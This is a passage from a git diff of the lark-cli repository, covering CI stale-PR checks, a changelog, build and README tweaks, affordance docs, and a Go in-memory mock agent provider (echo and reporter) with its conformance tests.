const { data: pr } = await github.rest.pulls.get({
@@ -326,12 +363,22 @@ jobs:
pull_number: prNumber,
});
if (pr.base.repo.id !== context.payload.repository.id) throw new Error("PR base repo mismatch");
if (pr.state !== "open") {
core.notice("semantic review skipped: workflow_run target PR is no longer open");
core.setOutput("stale", "true");
return;
}
if (!pr.head.repo) {
core.notice("semantic review skipped: workflow_run target PR head repository is unavailable");
core.setOutput("stale", "true");
return;
}
if (pr.head.sha !== targetHeadSha) {
core.notice("semantic review skipped: workflow_run is stale for this PR head");
core.setOutput("stale", "true");
return;
}
const baseSha = eventBaseSha || artifactBaseSha || pr.base.sha;
const baseSha = artifactBaseSha || eventBaseSha || pr.base.sha;
if (!/^[a-f0-9]{40}$/i.test(baseSha)) throw new Error("invalid PR base sha");
if ((eventBaseSha || artifactBaseSha) && pr.base.sha !== baseSha) {
core.notice("semantic review skipped: workflow_run is stale for this PR base");
@@ -383,6 +430,10 @@ jobs:
repo: context.repo.repo,
pull_number: pr,
});
if (pull.state !== "open") {
core.notice("semantic review skipped infrastructure failure check: PR is no longer open");
return;
}
if (pull.head.sha !== headSha) {
core.notice("semantic review skipped infrastructure failure check: PR head changed");
return;

11
.gitignore vendored
View File

@@ -7,6 +7,11 @@ bin/
# Node
node_modules/
# Python (skill-bundled helper scripts)
__pycache__/
*.py[cod]
*$py.class
# OS
.DS_Store
@@ -46,3 +51,9 @@ app.log
cover*.out
lark-env.sh
/automations/
# Local-only proof artifacts and coverage reports (never committed)
coverage.html
tests_e2e/
tests_skill_eval/

View File

@@ -2,6 +2,111 @@
All notable changes to this project will be documented in this file.
## [v1.0.61] - 2026-06-30
### Features
- **apps**: Add `db`, `file`, `openapi-key` and observability shortcuts (#1596)
- **identity**: Add `whoami` command showing effective identity (#1666)
- **docs**: Add reference map flags (#1547)
### Bug Fixes
- **identity**: Correct identity diagnosis under external credential providers (#1693)
- **cli**: Harden git credential error handling (#1676)
### Documentation
- **doc**: Guide document copy skill usage (#1673)
- **doc**: Fix lark-doc media token examples (#1662)
## [v1.0.60] - 2026-06-29
### Features
- **affordance**: Per-command usage guidance system with markdown source (#1565)
- **event**: Support VC meeting lifecycle events (#1632)
- **sheets**: Use `office_sheet_file` parent_type for imported office spreadsheets (#1606)
- **authorization**: Expand lark-shared auth guidance and assert clean logout JSON (#1598)
- **transport**: Add `LARK_CLI_NO_PROXY_WARN` to silence proxy warning (#1647)
### Bug Fixes
- **install**: Load `@clack/prompts` via dynamic import to avoid `ERR_REQUIRE_ESM` (#1652)
### Tests
- **doc**: Derive fetch test flag defaults from `v2FetchFlags` (#1428)
### Build
- **ci**: Reduce public content false positives
## [v1.0.59] - 2026-06-26
### Features
- **slides**: Add `+replace-pages` and `xml get` shortcuts, and expose the presentation URL (#1585)
- **minutes**: Support speaker list and no-Lark speaker replace (#1594)
- **calendar/vc/minutes**: Optimize and extend calendar, vc, minutes, and note shortcuts and skills (#1571)
### Bug Fixes
- **docs**: Hide docs `api-version` compat flag (#1580)
## [v1.0.58] - 2026-06-25
### Features
- **sheets**: Typed table I/O and error contract, workbook import/export, and skill refresh (#1355)
- **base**: Add Base URL and title resolve shortcuts (#1338)
- **drive**: Add `+member-add` shortcut with wiki space member collection collaborator support (#1204)
- **doc**: Support `create` title option (#1536)
- **doc**: Add `im-markdown` output format for doc fetch (#1550)
- **whiteboard**: Export whiteboard as SVG and update whiteboard via SVG (#1559)
- **card**: Support `card.action.trigger` event with auto-fetched card content (#1528)
- **task**: Add task event consumer (#1510)
### Bug Fixes
- **doc**: Prefix docs resource shortcuts (#1564)
- **binding**: Skip unix mode audit on Windows (#1525)
### Documentation
- **approval**: Sync approval skill for meta API commands (#1499)
- **doc**: Restore lark-doc style requirements (#1579)
- **im**: Document `chat.nickname` get/update/delete (#1378)
- **im**: Clarify audio message opus requirement (#1271)
### Build
- **ci**: Add public content safeguards and reduce false positives
## [v1.0.57] - 2026-06-23
### Features
- **slides**: Add `+screenshot` to capture slide page images (or render a single `<slide>` XML snippet), returning the local file path instead of Base64 (#1358)
- **base**: Support record comments (#1043)
- **search**: Surface search API notices (#1413)
### Bug Fixes
- **mail**: Resolve folder/label filter once per `+triage list` call (#1512)
- **meta**: Backfill enum value descriptions from options (#1541)
- **cli**: Add missing CLI headers for git credential helper (#1539)
### Documentation
- **doc**: Refine rich block, path, and block ID guidance (#1508)
- **mail**: Trim lark-mail skill context (#1527)
- **drive**: Add permission governance workflow guidance (#1292)
### Build
- **ci**: Bind semantic review to workflow run head (#1551)
## [v1.0.56] - 2026-06-18
### Features
@@ -1212,6 +1317,11 @@ Bundled AI agent skills for intelligent assistance:
- Bilingual documentation (English & Chinese).
- CI/CD pipelines: linting, testing, coverage reporting, and automated releases.
[v1.0.61]: https://github.com/larksuite/cli/releases/tag/v1.0.61
[v1.0.60]: https://github.com/larksuite/cli/releases/tag/v1.0.60
[v1.0.59]: https://github.com/larksuite/cli/releases/tag/v1.0.59
[v1.0.58]: https://github.com/larksuite/cli/releases/tag/v1.0.58
[v1.0.57]: https://github.com/larksuite/cli/releases/tag/v1.0.57
[v1.0.56]: https://github.com/larksuite/cli/releases/tag/v1.0.56
[v1.0.55]: https://github.com/larksuite/cli/releases/tag/v1.0.55
[v1.0.54]: https://github.com/larksuite/cli/releases/tag/v1.0.54

View File

@@ -12,6 +12,7 @@ QUALITY_GATE_DIR ?= .tmp/quality-gate
QUALITY_GATE_MANIFEST_OUT ?= $(QUALITY_GATE_DIR)/command-manifest.json
QUALITY_GATE_COMMAND_INDEX_OUT ?= $(QUALITY_GATE_DIR)/command-index.json
QUALITY_GATE_FACTS_OUT ?= $(QUALITY_GATE_DIR)/facts.json
PUBLIC_CONTENT_METADATA ?= $(QUALITY_GATE_DIR)/public-content-metadata.json
LDFLAGS := -s -w -X $(MODULE)/internal/build.Version=$(VERSION) -X $(MODULE)/internal/build.Date=$(DATE)
PREFIX ?= /usr/local
@@ -69,7 +70,8 @@ integration-test: build
test: vet fmt-check script-test unit-test examples-build integration-test
quality-gate: build
mkdir -p $(QUALITY_GATE_DIR) $(dir $(QUALITY_GATE_FACTS_OUT))
mkdir -p $(QUALITY_GATE_DIR) $(dir $(QUALITY_GATE_FACTS_OUT)) $(dir $(PUBLIC_CONTENT_METADATA))
test -f $(PUBLIC_CONTENT_METADATA) || printf '{}\n' > $(PUBLIC_CONTENT_METADATA)
LARKSUITE_CLI_REMOTE_META=off \
LARKSUITE_CLI_NO_UPDATE_NOTIFIER=1 \
LARKSUITE_CLI_NO_SKILLS_NOTIFIER=1 \
@@ -89,6 +91,7 @@ quality-gate: build
--changed-from $(QUALITY_GATE_CHANGED_FROM_RESOLVED) \
--manifest $(QUALITY_GATE_MANIFEST_OUT) \
--command-index $(QUALITY_GATE_COMMAND_INDEX_OUT) \
--public-content-metadata $(PUBLIC_CONTENT_METADATA) \
--facts-out $(QUALITY_GATE_FACTS_OUT)
install: build

View File

@@ -198,7 +198,7 @@ Prefixed with `+`, designed to be friendly for both humans and AI, with smart de
```bash
lark-cli calendar +agenda
lark-cli im +messages-send --chat-id "oc_xxx" --text "Hello"
lark-cli docs +create --api-version v2 --doc-format markdown --content $'<title>Weekly Report</title>\n# Progress\n- Completed feature X'
lark-cli docs +create --doc-format markdown --content $'<title>Weekly Report</title>\n# Progress\n- Completed feature X'
```
Run `lark-cli <service> --help` to see all shortcut commands.

View File

@@ -199,7 +199,7 @@ CLI 提供三种粒度的调用方式,覆盖从快速操作到完全自定义
```bash
lark-cli calendar +agenda
lark-cli im +messages-send --chat-id "oc_xxx" --text "Hello"
lark-cli docs +create --api-version v2 --doc-format markdown --content $'<title>周报</title>\n# 本周进展\n- 完成了 X 功能'
lark-cli docs +create --doc-format markdown --content $'<title>周报</title>\n# 本周进展\n- 完成了 X 功能'
```
运行 `lark-cli <service> --help` 查看所有快捷命令。

49
affordance/README.md Normal file
View File

@@ -0,0 +1,49 @@
# Affordance
Per-command usage guidance for the CLI, authored as one markdown file per domain
(`<service>.md`). It is surfaced in `lark-cli <command> --help` and in the
`schema` output, and read directly at runtime (lazy, cached) — there is no build
step. Maintain these files alongside `skills/` and `shortcuts/`.
## Format
A small, fixed markdown subset; each file describes one domain:
# <domain> optional `> skill: <name>` applies to every command below
## <command> the command as typed, minus `lark-cli <domain>`
<lead paragraph> when to use this command
### Avoid when when not to use it / which command to use instead
### Prerequisites what you must have first (e.g. an id, and where it comes from)
### Tips gotchas and constraints
### Examples **description** lines, each followed by a fenced command
### <other heading> a custom section; flows through verbatim
Reference another command with `[[command]]` — it renders as `command` in help.
Under `Avoid when` it means "use that one instead"; under `Prerequisites`
("… from [[command]]") it means "get the input there first".
## Example
## messages get
Fetch the full content of a single message by id.
### Avoid when
- Reading several at once → use [[messages batch_get]]
### Prerequisites
- message_id from [[messages list]]
### Examples
**Fetch one message**
```bash
lark-cli mail user_mailbox.messages get --message-id "<id>"
```
## Notes
- Write plain prose; the only convention is wrapping command references in `[[ ]]`.
- Keep it concise and high-signal — don't restate field/flag names, id types, or
anything the schema and flags already show; the agent infers the rest.
- Command-form headings resolve to method ids via the registry, so plural resource
names (`messages`) map to the singular method id (`message`) automatically.

19
affordance/contact.md Normal file
View File

@@ -0,0 +1,19 @@
# contact
> skill: lark-contact
## user_profiles batch_query
Bulk-fetch personal status and signature for user ids you already have.
### Avoid when
- Need more than status/signature (name, dept, email), or don't have the open_id yet → use [[+search-user]]
### Tips
- Off by default — set include_personal_status / include_description to true under query_option
- ids in user_ids must match --user-id-type (default open_id)
### Examples
**Bulk-query status and signature**
```bash
lark-cli contact user_profiles batch_query --data '{"user_ids":["ou_3a8b****6a7b"],"query_option":{"include_personal_status":true,"include_description":true}}'
```

365
agent/example/example.go Normal file
View File

@@ -0,0 +1,365 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
// Package example is the in-repo agent provider onboarding template and offline
// demo backend: a hypothetical example business domain whose data / calls are
// entirely in-memory mocks, with zero network. It has three roles:
//
// 1. A copy-start point for new integrators — copy the whole package and rename
// it; every key decision point carries a teaching comment from the
// "integrator's perspective" (how to fill registration fields, which
// capabilities to wire, how to make capability trade-offs);
// 2. The command tree's offline demo backend — the full agent
// list/card/send/task/context chain runs for real without any platform
// configuration;
// 3. A stable mock scheme for cmd-layer tests.
//
// Minimal checklist for onboarding a new provider (each item is demonstrated in
// this package):
// - register metadata via agent.Register in init() (see the per-field comments below);
// - construct a *agent.Provider in the Factory, wiring one func field per
// capability you support — the core Send/GetTask are mandatory, every other
// field is optional and "not wired = not supported" (the framework returns a
// unified unsupported_capability error and derives the card matrix from what
// is wired, so there is no bool matrix to keep in sync and no capability-
// refusal code to write);
// - a catalog type (KindCatalog) must wire ListAgents (asserted at registration);
// - add a blank import under agent/register.go to trigger init registration;
// - run agenttest.RunConformance in tests to lock down implicit contracts.
package example
import (
"context"
"fmt"
"github.com/larksuite/cli/errs"
"github.com/larksuite/cli/internal/agent"
)
// scheme is this provider's ref prefix (example:<agent_id>). It is globally
// unique; duplicate registration panics during init (aligned with the
// sql.Register convention, fail-fast to expose onboarding errors).
const scheme = "example"
// catalog is the full agent set known at registration time. The catalog
// boilerplate (enumeration / per-agent Card metadata / typed error for unknown
// ids) is handled by the framework's StaticCatalog; the integrator only declares
// the descriptive data. Capabilities are NOT declared here — see newProvider,
// where each agent's supported capabilities are expressed by which Provider func
// fields the Factory wires.
var catalog = agent.NewStaticCatalog(scheme, []agent.CatalogEntry{
{
ID: "echo",
Name: "复读机",
Description: "把你发的话原样复读一遍(同一会话续发时带轮次,证明上下文记忆)。最小能力集示范。",
},
{
ID: "reporter",
Name: "报表生成器",
Description: "对任意请求产出一份内联 CSV 报表 artifact示范 artifact 下载与任务取消链路。",
},
})
func init() {
// Registration contract (internal/agent/registry.go): everything except
// RequiredScopes is required; missing / invalid values panic. At registration
// time it also constructs a Provider once via a zero-value Deps probe — so the
// Factory must accept zero-value Deps and an empty agentID, have no side
// effects during construction (no network, no disk), and wire the mandatory
// core fields (Send/GetTask) plus, for a catalog type, ListAgents.
agent.Register(scheme, agent.ProviderInfo{
Factory: newProvider,
// Label: the user-facing provider name (the LABEL column in agent list).
Label: "Example 演示 agent内存 mock零网络",
// AgentRefFormat: the written format of agent_ref, must start with "<scheme>:" (validated at registration).
AgentRefFormat: "example:<agent_id>",
// AgentIDSource: tells the user / AI where to get the agent_id — key
// information for AI-guided onboarding, referenced by the unknown-id hint
// and the not-discoverable list hint.
AgentIDSource: "运行 lark-cli agent list example 查看内置演示 agent 及其 agent_ref无需任何平台配置",
// Kind: catalog type. Registration asserts the provider wires ListAgents,
// so `agent list example` can enumerate.
Kind: agent.KindCatalog,
// RequiredScopes: the full set of scopes this provider's real API calls
// need. example has zero network and calls no OAPI, so it is empty —
// scope preflight (cmd/agent/preflight.go) always passes for the empty
// set. A real provider must list every scope used by any verb (preflight
// is all-or-nothing).
RequiredScopes: nil,
// Identities: supported calling identities and their preconditions. The
// mock treats user/bot alike; if a real provider has a precondition for
// some identity (e.g. a bot needs channel whitelisting), put it in
// Precondition and the card passes it through to the AI verbatim.
Identities: []agent.IdentitySpec{
{Type: agent.IdentityUser},
{Type: agent.IdentityBot},
},
})
}
// state addresses one agent in the catalog. agentID may be empty — the
// enumeration path (agent list example) and the registration probe construct a
// state without an id.
type state struct {
deps agent.Deps
agentID string
}
// newProvider is the registered Factory. It assembles a *agent.Provider by
// wiring the func fields for the capabilities this agent supports.
//
// Teaching focus — capability is expressed as wiring, per agent:
// - Core Send/GetTask are wired unconditionally (mandatory).
// - The always-on optionals (ListTasks, the context trio, ListAgents, Describe)
// are wired for every agent.
// - reporter additionally wires CancelTask + DownloadArtifact and sets
// FileInput — echo does not, so echo's card honestly shows task_cancel /
// artifact_download / file_input = false. There is no bool matrix: the card
// is derived from exactly these fields (internal/agent/card.go DeriveCapabilities).
// - A capability you do not wire needs zero refusal code: the command layer
// gates on the nil field and returns unified unsupported_capability before
// any provider method runs.
//
// Teaching point — the Factory does pure assignment only: it does not validate
// agentID (an unknown id is rejected by catalog.Lookup inside the verbs that use
// it, and by Describe on the card path; the empty-id probe/enumeration instance
// must construct successfully) and does not touch deps (the mock has no use for
// Client/As, but construction must have no side effects either way — the
// zero-value Deps probe contract).
func newProvider(deps agent.Deps, agentID string) (*agent.Provider, error) {
s := &state{deps: deps, agentID: agentID}
p := &agent.Provider{
Send: s.send,
GetTask: s.getTask,
ListTasks: s.listTasks,
ListContexts: s.listContexts,
GetContext: s.getContext,
DeleteContext: s.deleteContext,
ListAgents: s.listAgents,
Describe: s.describe,
}
// Per-agent capability: reporter can be canceled and produces a downloadable
// artifact, accepts file input, and may pause a task in input_required; echo
// (minimal set) does none of these, so those fields stay nil/false and the
// framework reports them unsupported.
if agentID == "reporter" {
p.CancelTask = s.cancelTask
p.DownloadArtifact = s.downloadArtifact
p.FileInput = true
p.InputRequired = true
}
return p, nil
}
// describe supplies the per-agent Card metadata and validates the agent_id
// (StaticCatalog.Describe returns a typed unknown-id error). Capabilities are
// derived by the framework from the wired fields, so Describe never touches them.
func (s *state) describe(ctx context.Context) (*agent.CardInfo, error) {
return catalog.Describe(s.agentID)
}
// listAgents enumerates the catalog: `agent list example` goes here.
func (s *state) listAgents(ctx context.Context) ([]agent.AgentSummary, error) {
return catalog.ListAgents(ctx)
}
// send sends one message: the first turn generates a context_id to start a new
// conversation, and --context-id continues within the same conversation. The
// mock task has no async execution body, so send immediately returns in the
// completed terminal state — the command layer's meta.next therefore directly
// gives the terminal-state suggestion "view task detail and artifacts" rather
// than a polling command.
//
// Teaching point (IsTerminal): IsTerminal is filled in here for convenience, but
// leaving it out would be fine — the command layer's normalizeTask always
// re-derives this field from State (single source), so a provider filling it in
// wrong does not affect the watch exit code.
func (s *state) send(ctx context.Context, in agent.SendInput) (*agent.AgentTask, error) {
entry, err := catalog.Lookup(s.agentID)
if err != nil {
return nil, err
}
// The mock task is instantly terminal, so there is no "feed input to a running
// task" scenario. Continuing via --task-id returns failed_precondition: the
// request itself is valid but the target resource's state does not satisfy it
// — reading this subtype, the AI knows to "try a different way" (start a new
// task) rather than retry as-is. (This is a genuine runtime precondition, not
// a capability gate — hence a typed error here, not an unwired field.)
if in.TaskID != "" {
return nil, errs.NewValidationError(errs.SubtypeFailedPrecondition,
"example 的任务发出即完成(终态),无法向已有任务续发").
WithParam("--task-id").
WithHint("去掉 --task-id用 --context-id 在同一会话起新一轮任务")
}
ctxID := in.ContextID
if ctxID == "" {
// First turn: generate a context_id (the anchor for the multi-turn
// context; later sends use it to continue the conversation).
ctxID, err = store.createContext(s.agentID, truncateTitle(in.Text))
if err != nil {
return nil, err
}
}
// createTask validates context ownership while holding the lock (an unknown /
// cross-agent context id is rejected inside with a typed validation error),
// computes the round, and inserts atomically; the build callback only
// assembles the task body according to the round.
task, err := store.createTask(s.agentID, ctxID, func(round int) agent.AgentTask {
var reply string
switch entry.ID {
case "echo":
// Echo the input; from round 2 on, add a round marker to prove
// across commands that context memory really works.
reply = in.Text
if round > 1 {
reply = fmt.Sprintf("%s第 %d 轮)", in.Text, round)
}
default: // reporter
reply = "报表已生成quarterly_report.csv见 artifacts用 task get --artifact <id> -o <path> 下载)"
if n := len(in.Files); n > 0 {
reply = fmt.Sprintf("已收到 %d 个附件;%s", n, reply)
}
}
t := agent.AgentTask{
TaskID: newID("task"),
ContextID: ctxID,
State: agent.StateCompleted,
IsTerminal: true,
Messages: []agent.Message{
{Role: "user", Parts: []agent.Part{{Type: "text", Text: in.Text}}},
{Role: "agent", Parts: []agent.Part{{Type: "text", Text: reply}}},
},
}
if entry.ID == "reporter" {
// The artifact exposes only fields the provider can truly deliver
// (the contract.go rule: do not create empty shell fields that cannot
// be filled): the GetTask stage gives ID + Kind (a coarse-grained type
// hint), while the file name / mime are exposed at the
// DownloadArtifact stage as suggested_name.
t.Artifacts = []agent.Artifact{{ID: newID("art"), Kind: "text"}}
}
return t
})
if err != nil {
return nil, err
}
return &task, nil
}
// getTask queries a single task's state and artifacts (reads the in-memory state machine).
func (s *state) getTask(ctx context.Context, taskID string) (*agent.AgentTask, error) {
if _, err := catalog.Lookup(s.agentID); err != nil {
return nil, err
}
task, err := store.getTask(s.agentID, taskID)
if err != nil {
return nil, err
}
return &task, nil
}
// listTasks lists tasks, optionally filtered by contextID (empty string means no filter).
func (s *state) listTasks(ctx context.Context, contextID string) ([]agent.TaskSummary, error) {
if _, err := catalog.Lookup(s.agentID); err != nil {
return nil, err
}
return store.listTasks(s.agentID, contextID), nil
}
// cancelTask cancels a task. It is wired only for reporter (task_cancel=true), so
// echo never reaches it — the command layer gates echo's cancel on the nil field
// and returns unsupported_capability before any provider code runs. The mock
// task is completed the moment it is sent, so canceling a terminal task returns a
// failed_precondition typed error (state not satisfied, exit 2) rather than
// pretending success — honest error semantics matter as much as honest capability
// wiring.
func (s *state) cancelTask(ctx context.Context, taskID string) error {
if _, err := catalog.Lookup(s.agentID); err != nil {
return err
}
task, err := store.getTask(s.agentID, taskID)
if err != nil {
return err
}
if task.State.IsTerminal() {
return errs.NewValidationError(errs.SubtypeFailedPrecondition,
"任务 '%s' 已处于终态 %s无法取消", taskID, task.State).
WithHint("终态任务不可取消;用 lark-cli agent task get example:%s %s 查看结果", s.agentID, taskID)
}
return store.setTaskState(taskID, agent.StateCanceled)
}
// listContexts lists multi-turn contexts.
func (s *state) listContexts(ctx context.Context) ([]agent.ContextSummary, error) {
if _, err := catalog.Lookup(s.agentID); err != nil {
return nil, err
}
return store.listContexts(s.agentID), nil
}
// getContext returns a single context's detail (including its task list).
func (s *state) getContext(ctx context.Context, ctxID string) (*agent.ContextDetail, error) {
if _, err := catalog.Lookup(s.agentID); err != nil {
return nil, err
}
return store.getContext(s.agentID, ctxID)
}
// deleteContext deletes a context (a destructive operation; the --yes gate is in the command layer).
func (s *state) deleteContext(ctx context.Context, ctxID string) error {
if _, err := catalog.Lookup(s.agentID); err != nil {
return err
}
return store.deleteContext(s.agentID, ctxID)
}
// reportCSV is the fixed content of the reporter artifact (inline text, demonstrating a Bytes-type artifact).
const reportCSV = "quarter,revenue,cost,margin\n" +
"2026Q1,1250,830,0.336\n" +
"2026Q2,1410,905,0.358\n"
// downloadArtifact fetches artifact data. It is wired only for reporter
// (artifact_download=true); echo never reaches it (gated on the nil field).
// example uses the inline Bytes type (the command layer writes it to disk
// directly); the URL type (a real provider's signed URL) fills the URL field, and
// SSRF validation plus the download are handled uniformly by the command layer.
//
// Teaching point (suggested_name): ArtifactData.Name is the "server-suggested
// file name", echoed back only as a suggested_name for the caller to reference
// when choosing -o — it is untrusted input and must never participate in
// constructing the local save path (the contract.go rule; the save path is
// always determined by -o/SafeOutputPath).
func (s *state) downloadArtifact(ctx context.Context, taskID, artifactID string) (*agent.ArtifactData, error) {
if _, err := catalog.Lookup(s.agentID); err != nil {
return nil, err
}
task, err := store.getTask(s.agentID, taskID)
if err != nil {
return nil, err
}
for _, a := range task.Artifacts {
if a.ID == artifactID {
return &agent.ArtifactData{
Name: "quarterly_report.csv",
Mime: "text/csv",
Bytes: []byte(reportCSV),
}, nil
}
}
return nil, errs.NewValidationError(errs.SubtypeInvalidArgument,
"任务 '%s' 名下没有产物 '%s'", taskID, artifactID).
WithHint("运行 lark-cli agent task get example:%s %s 查看该任务的 artifacts", s.agentID, taskID)
}
// truncateTitle takes the first few characters of the message as the
// conversation title (truncated by rune to avoid cutting a character in half).
func truncateTitle(s string) string {
const max = 20
r := []rune(s)
if len(r) <= max {
return s
}
return string(r[:max]) + "…"
}

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@@ -0,0 +1,311 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package example
import (
"context"
"path/filepath"
"strings"
"testing"
"github.com/larksuite/cli/errs"
"github.com/larksuite/cli/internal/agent"
"github.com/larksuite/cli/internal/agent/agenttest"
)
// swapStore replaces the package-level store with an isolated instance pointing at
// t.TempDir, so tests do not pollute each other or the local demo snapshot.
func swapStore(t *testing.T) {
t.Helper()
old := store
store = newMemoryStore(filepath.Join(t.TempDir(), "state.json"))
t.Cleanup(func() { store = old })
}
// buildProvider builds an example *Provider with zero-value Deps (the mock never needs a Client).
func buildProvider(t *testing.T, agentID string) *agent.Provider {
t.Helper()
p, err := newProvider(agent.Deps{}, agentID)
if err != nil {
t.Fatalf("newProvider: %v", err)
}
return p
}
// TestConformance runs the shared conformance suite: locking registration metadata,
// the zero-value Deps contract, the single-source Card, and catalog enumeration (the
// discovery group automatically verifies ListAgents contains example:echo and enumerates stably).
func TestConformance(t *testing.T) {
agenttest.RunConformance(t, scheme, "echo")
}
// TestConformanceReporter runs it again with reporter, so both catalog entries are locked by the contract.
func TestConformanceReporter(t *testing.T) {
agenttest.RunConformance(t, scheme, "reporter")
}
// TestCapabilityMatrixDiverges pins the deliberate difference between the two agents'
// capability matrices (the core of the teaching demo: honest capability declaration
// plus task_cancel true for one and false for the other).
func TestCapabilityMatrixDiverges(t *testing.T) {
// The card matrix is derived from which Provider fields the Factory wires per
// agent, so DeriveCapabilities over the two constructed providers is the
// single source under test.
ec := agent.DeriveCapabilities(buildProvider(t, "echo"))
rc := agent.DeriveCapabilities(buildProvider(t, "reporter"))
if ec.ArtifactDownload || ec.FileInput || ec.TaskCancel {
t.Errorf("echo should be the minimal capability set (no artifact/file/cancel), got %+v", ec)
}
if !ec.MultiTurn || !ec.TaskGet || !ec.TaskList {
t.Errorf("echo should support multi_turn/task_get/task_list, got %+v", ec)
}
if !(rc.ArtifactDownload && rc.FileInput && rc.TaskCancel && rc.InputRequired && rc.MultiTurn && rc.TaskGet && rc.TaskList) {
t.Errorf("reporter should have everything enabled, got %+v", rc)
}
}
// TestEchoMultiTurn verifies multi-turn context memory: the first turn echoes the
// original text and generates a context_id, and a follow-up in the same context
// echoes with a turn marker.
func TestEchoMultiTurn(t *testing.T) {
swapStore(t)
p := buildProvider(t, "echo")
ctx := context.Background()
t1, err := p.Send(ctx, agent.SendInput{Text: "hello"})
if err != nil {
t.Fatalf("first-turn Send: %v", err)
}
if t1.State != agent.StateCompleted {
t.Fatalf("send should be immediately completed, got %s", t1.State)
}
if t1.ContextID == "" || t1.TaskID == "" {
t.Fatalf("first turn should generate context_id/task_id: %+v", t1)
}
if got := agentReply(t, t1); got != "hello" {
t.Fatalf("first-turn echo should be the original text, got %q", got)
}
t2, err := p.Send(ctx, agent.SendInput{Text: "再来", ContextID: t1.ContextID})
if err != nil {
t.Fatalf("follow-up Send: %v", err)
}
if t2.ContextID != t1.ContextID {
t.Fatalf("follow-up should stay in the same context: %q vs %q", t2.ContextID, t1.ContextID)
}
if got := agentReply(t, t2); got != "再来(第 2 轮)" {
t.Fatalf("second-turn echo should carry a turn marker, got %q", got)
}
// GetTask / ListTasks / ListContexts / GetContext read the same state machine.
got, err := p.GetTask(ctx, t2.TaskID)
if err != nil {
t.Fatalf("GetTask: %v", err)
}
if agentReply(t, got) != "再来(第 2 轮)" {
t.Fatalf("GetTask should replay the stored messages, got %+v", got.Messages)
}
tasks, err := p.ListTasks(ctx, t1.ContextID)
if err != nil {
t.Fatal(err)
}
if len(tasks) != 2 {
t.Fatalf("the same context should have 2 tasks, got %d", len(tasks))
}
ctxs, err := p.ListContexts(ctx)
if err != nil {
t.Fatal(err)
}
if len(ctxs) != 1 || ctxs[0].ContextID != t1.ContextID {
t.Fatalf("should have exactly 1 context with a matching id, got %+v", ctxs)
}
detail, err := p.GetContext(ctx, t1.ContextID)
if err != nil {
t.Fatal(err)
}
if len(detail.Tasks) != 2 {
t.Fatalf("context detail should contain 2 tasks, got %+v", detail)
}
}
// TestStateSurvivesReload pins the cross-process semantics: swapping in a new store
// instance pointing at the same snapshot file (simulating a new CLI process), the task
// is still queryable -- the offline demo chain depends on this.
func TestStateSurvivesReload(t *testing.T) {
swapStore(t)
p := buildProvider(t, "echo")
task, err := p.Send(context.Background(), agent.SendInput{Text: "persist"})
if err != nil {
t.Fatal(err)
}
// A new store instance = a new process view; only the snapshot file is shared memory.
store = newMemoryStore(store.path)
got, err := p.GetTask(context.Background(), task.TaskID)
if err != nil {
t.Fatalf("GetTask after reload: %v", err)
}
if got.ContextID != task.ContextID {
t.Fatalf("task should replay fully after reload: %+v", got)
}
}
// TestReporterArtifactFlow verifies the full artifact chain: send produces {ID, Kind:text},
// and DownloadArtifact returns inline Bytes + suggested_name.
func TestReporterArtifactFlow(t *testing.T) {
swapStore(t)
p := buildProvider(t, "reporter")
ctx := context.Background()
task, err := p.Send(ctx, agent.SendInput{Text: "本季度报表"})
if err != nil {
t.Fatal(err)
}
if len(task.Artifacts) != 1 {
t.Fatalf("reporter should produce 1 artifact, got %+v", task.Artifacts)
}
art := task.Artifacts[0]
if art.ID == "" || art.Kind != "text" {
t.Fatalf("artifact should carry ID + Kind=text, got %+v", art)
}
data, err := p.DownloadArtifact(ctx, task.TaskID, art.ID)
if err != nil {
t.Fatalf("DownloadArtifact: %v", err)
}
if data.Name != "quarterly_report.csv" {
t.Errorf("suggested_name should be quarterly_report.csv, got %q", data.Name)
}
if data.Mime != "text/csv" {
t.Errorf("mime should be text/csv, got %q", data.Mime)
}
if !strings.HasPrefix(string(data.Bytes), "quarter,revenue") {
t.Errorf("should return inline CSV bytes, got %q", string(data.Bytes))
}
// Unknown artifact id -> typed validation error.
if _, err := p.DownloadArtifact(ctx, task.TaskID, "art_nope"); err == nil {
t.Fatal("unknown artifact id should return an error")
} else if _, ok := errs.ProblemOf(err); !ok {
t.Fatalf("unknown artifact id should be a typed error, got %T: %v", err, err)
}
}
// TestEchoUnwiredCapabilities verifies the new capability model: echo (the
// minimal set) simply leaves CancelTask / DownloadArtifact unwired and FileInput
// false. There is no capability-refusal code — the command layer gates on the
// nil fields and returns unsupported_capability before any provider method runs.
func TestEchoUnwiredCapabilities(t *testing.T) {
p := buildProvider(t, "echo")
if p.CancelTask != nil {
t.Error("echo should not wire CancelTask (task_cancel=false)")
}
if p.DownloadArtifact != nil {
t.Error("echo should not wire DownloadArtifact (artifact_download=false)")
}
if p.FileInput {
t.Error("echo should not accept file input (file_input=false)")
}
}
// TestReporterCancelTerminal verifies reporter supports cancel but returns a
// failed_precondition typed error for a terminal task (the mock task is completed
// as soon as it is sent).
func TestReporterCancelTerminal(t *testing.T) {
swapStore(t)
p := buildProvider(t, "reporter")
ctx := context.Background()
task, err := p.Send(ctx, agent.SendInput{Text: "报表"})
if err != nil {
t.Fatal(err)
}
err = p.CancelTask(ctx, task.TaskID)
if err == nil {
t.Fatal("canceling a terminal task should return an error")
}
prob, ok := errs.ProblemOf(err)
if !ok {
t.Fatalf("terminal cancel should be a typed error, got %T: %v", err, err)
}
if prob.Subtype != errs.SubtypeFailedPrecondition {
t.Fatalf("terminal cancel subtype should be failed_precondition, got %s", prob.Subtype)
}
}
// TestUnknownCatalogID verifies an unknown catalog id goes through StaticCatalog.Lookup's
// typed error (invalid_argument, with a hint pointing to agent list example).
func TestUnknownCatalogID(t *testing.T) {
swapStore(t)
p := buildProvider(t, "nonexistent")
ctx := context.Background()
if _, err := agent.BuildCard(ctx, scheme, "nonexistent", p); err == nil {
t.Fatal("BuildCard with an unknown catalog id should return an error (Describe validates the id)")
}
_, err := p.Send(ctx, agent.SendInput{Text: "hi"})
if err == nil {
t.Fatal("Send with an unknown catalog id should return an error")
}
prob, ok := errs.ProblemOf(err)
if !ok || prob.Subtype != errs.SubtypeInvalidArgument {
t.Fatalf("unknown catalog id should be an invalid_argument typed error, got %v", err)
}
}
// TestSendGuards pins Send's two typed rejections: --task-id follow-up (terminal
// semantics) and an unknown context id.
func TestSendGuards(t *testing.T) {
swapStore(t)
p := buildProvider(t, "echo")
ctx := context.Background()
